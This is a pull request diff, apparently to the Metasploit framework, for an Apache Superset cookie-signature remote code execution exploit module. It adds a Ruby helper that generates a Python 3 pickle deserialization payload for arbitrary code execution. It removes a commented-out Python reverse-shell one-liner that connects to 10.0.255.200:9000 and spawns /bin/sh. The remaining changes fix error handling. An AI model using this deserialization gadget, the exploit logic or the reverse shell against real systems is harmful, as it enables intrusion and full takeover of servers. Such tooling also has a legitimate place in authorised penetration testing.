### PR TITLE
Pr/collab/18351

### DIFF
--- a/lib/msf/util/python_deserialization.rb
+++ b/lib/msf/util/python_deserialization.rb
@@ -1,0 +1,30 @@
+# -*- coding: binary -*-
+
+# Python deserialization Utility
+module Msf
+  module Util
+    # Python deserialization class
+    class PythonDeserialization
+      # That could be in the future a list of payloads used to exploit the Python deserialization vulnerability.
+      PAYLOADS = {
+        # this payload will work with Python 3.x targets to execute Python code in place
+        py3_exec: proc do |python_code|
+          escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
+          %|c__builtin__\nexec\np0\n(V#{escaped}\np1\ntp2\nRp3\n.|
+        end
+      }
+
+      def self.payload(payload_name, command = nil)
+
+        raise ArgumentError, "#{payload_name} payload not found in payloads" unless payload_names.include? payload_name.to_sym
+
+        PAYLOADS[payload_name.to_sym].call(command)
+      end
+
+      def self.payload_names
+        PAYLOADS.keys
+      end
+
+    end
+  end
+end

--- a/modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb
+++ b/modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb
@@ -273,6 +273,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Failed to mount the internal database: #{datastore['DATABASE']}") if res.code == 422
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 201
 
     j = res.get_json_document

--- a/modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb
+++ b/modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb
@@ -460,26 +460,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # tell it we're about to submit a new query
     set_query_latest_query_id
 
-    # Here's the python of the payload pickle generator
-    # import pickle
-    # from binascii import hexlify
-    # import os
-    # import argparse
-    # import base64
-
-    # command = "python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.255.200\",9000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'"
-
-    # class PickleRCE:
-    #        def __reduce__(self):
-    #          return os.system, (command,)
-
-    # payload = pickle.dumps(PickleRCE(), protocol=0)
-    # print(f'Raw Payload: {payload}')
-    # print()
-    # print(f'Hex: {hexlify(payload).decode()}')
-    pickled = %|cposix\nsystem\np0\n(V|
-    pickled << %(python -c "#{payload.encoded}"\np1\ntp2\nRp3\n.)
-    pickled = Rex::Text.to_hex(pickled)
+    pickled = Rex::Text.to_hex(Msf::Util::PythonDeserialization.payload(:py3_exec, payload.encoded))
     pickled = pickled.gsub('\x', '') # we only need a beginning \x not every character for this format
 
     vprint_status('Uploading payload')
@@ -520,7 +501,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'superset', 'dashboard', 'p', permalink_key, '/')
     )
     # we go through some permalink hell here
-    until res.headers['Location'].nil?
+    until res.nil? || res.headers['Location'].nil?
       res = send_request_cgi(
         'keep_cookies' => true,
         'cookie' => "session=#{@admin_cookie};",


### PR DESCRIPTION
This makes the following changes:

* Raises a more specific error message when failing because the internal database could not be mounted i.e. the `DATABASE` option is incorrect.
* Uses a new Python deserialization module that will execute the Python payload inline. The gadget is only compatible with Python 3, but the [oldest version of Superset on PyPi](https://pypi.org/project/apache-superset/0.34.0/) only supports Python 3.6.
* Fixes an error when `res` is nil because the payload is running.
* Moves the `add_equals_to_base64` function to be private by just defining it inline.